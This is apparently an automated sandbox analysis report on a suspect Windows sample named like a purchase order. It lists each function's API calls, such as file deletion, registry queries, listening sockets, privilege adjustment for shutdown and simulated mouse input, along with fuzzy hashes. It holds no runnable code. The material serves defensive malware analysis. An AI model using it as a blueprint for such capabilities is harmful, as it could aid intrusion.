                          • GetFileAttributesW.KERNEL32(?), ref: 00F796A1
                          • SetFileAttributesW.KERNEL32(?,?), ref: 00F796BB
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00F796D3
                          • FindClose.KERNEL32(00000000), ref: 00F796DE
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00F796FA
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F7974A
                          • SetCurrentDirectoryW.KERNEL32(00FC6B7C), ref: 00F79768
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F79772
                          • FindClose.KERNEL32(00000000), ref: 00F7977F
                          • FindClose.KERNEL32(00000000), ref: 00F7978F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                          • String ID: *.*
                          • API String ID: 1409584000-438819550
                          • Opcode ID: 19503834500e67b8116de6b1321259333183f85a0da906f7c135d641ff66cbd2
                          • Instruction ID: e32afc5d639638b565c8f52634ab2529f27db486db4aa0e71d1a424708a6bc76
                          • Opcode Fuzzy Hash: 19503834500e67b8116de6b1321259333183f85a0da906f7c135d641ff66cbd2
                          • Instruction Fuzzy Hash: BE31C3329452196BDF14EFB4EC09EDE77AC9F49320F108157F819E20A0DB74DD41AE61
                          Function 00F7979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F797BE
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00F79819
                          • FindClose.KERNEL32(00000000), ref: 00F79824
                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00F79840
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F79890
                          • SetCurrentDirectoryW.KERNEL32(00FC6B7C), ref: 00F798AE
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F798B8
                          • FindClose.KERNEL32(00000000), ref: 00F798C5
                          • FindClose.KERNEL32(00000000), ref: 00F798D5
                            • Part of subcall function 00F6DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F6DB00
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                          • String ID: *.*
                          • API String ID: 2640511053-438819550
                          • Opcode ID: d23ae280c62240ef2c6f34c1435eb749172cd439eefc3a932ff40aa84cf46121
                          • Instruction ID: 6a05495af8a65981ad8d88a87f113381f3ac3ba40b0b57e70a1f2fd02de39df5
                          • Opcode Fuzzy Hash: d23ae280c62240ef2c6f34c1435eb749172cd439eefc3a932ff40aa84cf46121
                          • Instruction Fuzzy Hash: A431E5319042196ADF10EFB4EC49EDE77AC9F46330F548197E818E21E0DB74DD44EA62
                          Function 00F8BE44 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F8C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8B6AE,?,?), ref: 00F8C9B5
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8C9F1
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA68
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA9E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8BF3E
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00F8BFA9
                          • RegCloseKey.ADVAPI32(00000000), ref: 00F8BFCD
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F8C02C
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F8C0E7
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F8C154
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F8C1E9
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00F8C23A
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F8C2E3
                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F8C382
                          • RegCloseKey.ADVAPI32(00000000), ref: 00F8C38F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                          • String ID:
                          • API String ID: 3102970594-0
                          • Opcode ID: 89c7e58e8dbeecd638f9a563789d72a76023d9f2c1206351b2558e1e5c505446
                          • Instruction ID: ee2f9344259889e8b44bd4c55f7e573c6a9b86a1f7a18ef5563f7ecac967a85d
                          • Opcode Fuzzy Hash: 89c7e58e8dbeecd638f9a563789d72a76023d9f2c1206351b2558e1e5c505446
                          • Instruction Fuzzy Hash: 41027171A042009FD714DF24C895E6ABBE5EF49314F18C49DF84ADB2A2D731EC46EBA1
                          Function 00F78195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetLocalTime.KERNEL32(?), ref: 00F78257
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F78267
                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F78273
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F78310
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78324
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78356
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F7838C
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78395
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CurrentDirectoryTime$File$Local$System
                          • String ID: *.*
                          • API String ID: 1464919966-438819550
                          • Opcode ID: d0367eb354755d694f482ea6b9a57b5cb33ca8aea9a7bf19e36dae4ea74b32da
                          • Instruction ID: 8cc2c8056ade6293689cb967f90fc91260b0564288384e79eb9c46ca748edb40
                          • Opcode Fuzzy Hash: d0367eb354755d694f482ea6b9a57b5cb33ca8aea9a7bf19e36dae4ea74b32da
                          • Instruction Fuzzy Hash: 44618CB25083059FC710EF64C8449AEB3E8FF89364F04891EF989C7251DB35E946EB92
                          Function 00F6D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F03AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F03A97,?,?,00F02E7F,?,?,?,00000000), ref: 00F03AC2
                            • Part of subcall function 00F6E199: GetFileAttributesW.KERNEL32(?,00F6CF95), ref: 00F6E19A
                          • FindFirstFileW.KERNEL32(?,?), ref: 00F6D122
                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00F6D1DD
                          • MoveFileW.KERNEL32(?,?), ref: 00F6D1F0
                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F6D20D
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6D237
                            • Part of subcall function 00F6D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00F6D21C,?,?), ref: 00F6D2B2
                          • FindClose.KERNEL32(00000000,?,?,?), ref: 00F6D253
                          • FindClose.KERNEL32(00000000), ref: 00F6D264
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                          • String ID: \*.*
                          • API String ID: 1946585618-1173974218
                          • Opcode ID: b5c24f4d9c976cc5c0eb803096a9db8e4e07f69c5b6591aaf014d3b76f3e2605
                          • Instruction ID: 1ac3735354b15543fb219f98fac4cdd5f14ec09a1d263ccdece2fe879ecf125b
                          • Opcode Fuzzy Hash: b5c24f4d9c976cc5c0eb803096a9db8e4e07f69c5b6591aaf014d3b76f3e2605
                          • Instruction Fuzzy Hash: 93615C31D0510DABCF05EBA0CE929EEB7B9AF55300F608165E401B7192EB746F09FB60
                          Function 00F7ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                          • String ID:
                          • API String ID: 1737998785-0
                          • Opcode ID: c5a754687e4e809d660453e2cb6d205cfccd88f6550a7a9b6482ebbceaaeb483
                          • Instruction ID: e50826100354f786740ef49d6122c239179d42cdffd6cbb39d1b0514a6bfa27e
                          • Opcode Fuzzy Hash: c5a754687e4e809d660453e2cb6d205cfccd88f6550a7a9b6482ebbceaaeb483
                          • Instruction Fuzzy Hash: BA419C35604611AFE321DF15E888F29BBE5EF48328F15C49BE4198B6A2C735EC41EBD1
                          Function 00F6E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F6170D
                            • Part of subcall function 00F616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F6173A
                            • Part of subcall function 00F616C3: GetLastError.KERNEL32 ref: 00F6174A
                          • ExitWindowsEx.USER32(?,00000000), ref: 00F6E932
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                          • String ID: $ $@$SeShutdownPrivilege
                          • API String ID: 2234035333-3163812486
                          • Opcode ID: 2a1791183944858f43b9d3f58685c2c002877d22fbccda52a54d3f7495b1c6c1
                          • Instruction ID: cce408ed1763574f19e738b2f7f6c396061040b540b42f16de45183e4d783c18
                          • Opcode Fuzzy Hash: 2a1791183944858f43b9d3f58685c2c002877d22fbccda52a54d3f7495b1c6c1
                          • Instruction Fuzzy Hash: 0001D677A10215ABFB6467B49C86FBB736CAF14750F190422F803E21D1D5A55C40B1E0
                          Function 00F81204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                          Download Yara Rule
                          APIs
                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F81276
                          • WSAGetLastError.WSOCK32 ref: 00F81283
                          • bind.WSOCK32(00000000,?,00000010), ref: 00F812BA
                          • WSAGetLastError.WSOCK32 ref: 00F812C5
                          • closesocket.WSOCK32(00000000), ref: 00F812F4
                          • listen.WSOCK32(00000000,00000005), ref: 00F81303
                          • WSAGetLastError.WSOCK32 ref: 00F8130D
                          • closesocket.WSOCK32(00000000), ref: 00F8133C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorLast$closesocket$bindlistensocket
                          • String ID:
                          • API String ID: 540024437-0
                          • Opcode ID: bc3a370aee57fb978a2c2fed2c85cb33426d61a6088e054a4f9ac0a60035bb95
                          • Instruction ID: 116e42383d3b79b897e50d0cd73bc0057cf3eb6a7e03873e8cd541703562b780
                          • Opcode Fuzzy Hash: bc3a370aee57fb978a2c2fed2c85cb33426d61a6088e054a4f9ac0a60035bb95
                          • Instruction Fuzzy Hash: 4041B631A001049FD710EF64C884B69BBE5BF46328F188289D8568F2D6C775ED82EBE1
                          Function 00F6D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F03AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F03A97,?,?,00F02E7F,?,?,?,00000000), ref: 00F03AC2
                            • Part of subcall function 00F6E199: GetFileAttributesW.KERNEL32(?,00F6CF95), ref: 00F6E19A
                          • FindFirstFileW.KERNEL32(?,?), ref: 00F6D420
                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F6D470
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6D481
                          • FindClose.KERNEL32(00000000), ref: 00F6D498
                          • FindClose.KERNEL32(00000000), ref: 00F6D4A1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                          • String ID: \*.*
                          • API String ID: 2649000838-1173974218
                          • Opcode ID: a14834d7d6a60a8b95f7586272854c41acce835ec532c4be7aae7ea806945b3d
                          • Instruction ID: dbb4e16bbbc71e40f771ea418a2a083a6aa7ed92a3fc0e756c9644c9e3f733bd
                          • Opcode Fuzzy Hash: a14834d7d6a60a8b95f7586272854c41acce835ec532c4be7aae7ea806945b3d
                          • Instruction Fuzzy Hash: 1C314B715083459BC204EF64DC929AFB7E8AE91314F844A1EF4D1921D1EB34AA09BBA3
                          Function 00F3E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: __floor_pentium4
                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                          • API String ID: 4168288129-2761157908
                          • Opcode ID: 6aaaea51e0156535a99e6ff7ec0ae8114e642fd7f7e5a0a012450f8161e801c2
                          • Instruction ID: 1e2aa11153eaa5333b720cb3c23e4902f4871348ecaa30abd4dad1e51e45dfab
                          • Opcode Fuzzy Hash: 6aaaea51e0156535a99e6ff7ec0ae8114e642fd7f7e5a0a012450f8161e801c2
                          • Instruction Fuzzy Hash: 1FC24C72E046288FDB65CE28DD407EAB7B5EF44324F1441EAD84DE7281E778AE859F40
                          Function 00F7648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 00F764DC
                          • CoInitialize.OLE32(00000000), ref: 00F76639
                          • CoCreateInstance.OLE32(00F9FCF8,00000000,00000001,00F9FB68,?), ref: 00F76650
                          • CoUninitialize.OLE32 ref: 00F768D4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                          • String ID: .lnk
                          • API String ID: 886957087-24824748
                          • Opcode ID: 7ca500a061d437ce6c3bcca8271f4f270385c2b18938448a3f3f33b7469afd20
                          • Instruction ID: 4603d9d423964ff34fd4dcf8f76f48550a8b10f3a2c6dda281ac38affc7bd544
                          • Opcode Fuzzy Hash: 7ca500a061d437ce6c3bcca8271f4f270385c2b18938448a3f3f33b7469afd20
                          • Instruction Fuzzy Hash: DFD13A715087019FD304EF24C881A6BB7E9FF98704F44896DF599CB291EB70E909EB92
                          Function 00F822DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32(?,?,00000000), ref: 00F822E8
                            • Part of subcall function 00F7E4EC: GetWindowRect.USER32(?,?), ref: 00F7E504
                          • GetDesktopWindow.USER32 ref: 00F82312
                          • GetWindowRect.USER32(00000000), ref: 00F82319
                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00F82355
                          • GetCursorPos.USER32(?), ref: 00F82381
                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F823DF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                          • String ID:
                          • API String ID: 2387181109-0
                          • Opcode ID: 73ca8d63e95520f6e4c8ea10521e68c3cd805d5dc24817875524e65db3de234c
                          • Instruction ID: 21f191d1cc47c79128544f97cd5515cdc8b741db3c738e0104808198c44d4832
                          • Opcode Fuzzy Hash: 73ca8d63e95520f6e4c8ea10521e68c3cd805d5dc24817875524e65db3de234c
                          • Instruction Fuzzy Hash: 8631B072504315AFD760EF54CC45B9BB7A9FF84314F00091AF98597191DB34E908DBD2
                          Function 00F79B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00F79B78
                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00F79C8B
                            • Part of subcall function 00F73874: GetInputState.USER32 ref: 00F738CB
                            • Part of subcall function 00F73874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F73966
                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00F79BA8
                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00F79C75
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                          • String ID: *.*
                          • API String ID: 1972594611-438819550
                          • Opcode ID: c577c02a963c3d8a79afaba2e111f4e40b5d86c6aaf1de05f4631178cd5bddde
                          • Instruction ID: 5a09efa150b27329fa17c73e4743bdbf2d529eb4a7e115ffdf90a012647be544
                          • Opcode Fuzzy Hash: c577c02a963c3d8a79afaba2e111f4e40b5d86c6aaf1de05f4631178cd5bddde
                          • Instruction Fuzzy Hash: D241B471D0820AAFCF15DF64CD85AEE7BF8EF05310F148056E409A2191EB749E84EF61
                          Function 00F1997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F19BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F19BB2
                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00F19A4E
                          • GetSysColor.USER32(0000000F), ref: 00F19B23
                          • SetBkColor.GDI32(?,00000000), ref: 00F19B36
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Color$LongProcWindow
                          • String ID:
                          • API String ID: 3131106179-0
                          • Opcode ID: 687518c5c178ec077bb7428a270ad70cb1e65d6ad692447210c24df8038ac30c
                          • Instruction ID: c2e1c9abe8c763aa00baa3d34280b4f9ddb0e6d14d195edf92899a00aa75b938
                          • Opcode Fuzzy Hash: 687518c5c178ec077bb7428a270ad70cb1e65d6ad692447210c24df8038ac30c
                          • Instruction Fuzzy Hash: 15A14D7160C504BEE724EA3CAC78EFB369DEF46351B150109F902C6591C6AD9D89F2F2
                          Function 00F81806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F8304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F8307A
                            • Part of subcall function 00F8304E: _wcslen.LIBCMT ref: 00F8309B
                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F8185D
                          • WSAGetLastError.WSOCK32 ref: 00F81884
                          • bind.WSOCK32(00000000,?,00000010), ref: 00F818DB
                          • WSAGetLastError.WSOCK32 ref: 00F818E6
                          • closesocket.WSOCK32(00000000), ref: 00F81915
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
